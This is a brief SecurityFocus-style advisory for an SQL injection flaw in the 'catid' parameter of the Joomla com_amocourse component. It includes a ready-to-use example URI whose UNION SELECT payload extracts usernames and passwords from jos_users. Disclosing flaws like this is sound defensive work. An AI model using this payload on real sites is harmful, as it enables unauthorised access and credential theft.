Joomla! 'com_amocourse' Component 'catid' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/path//index.php?option=com_amocourse&task=view&view=category&catid=+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users--


 

Privacy Statement
Copyright 2010, SecurityFocus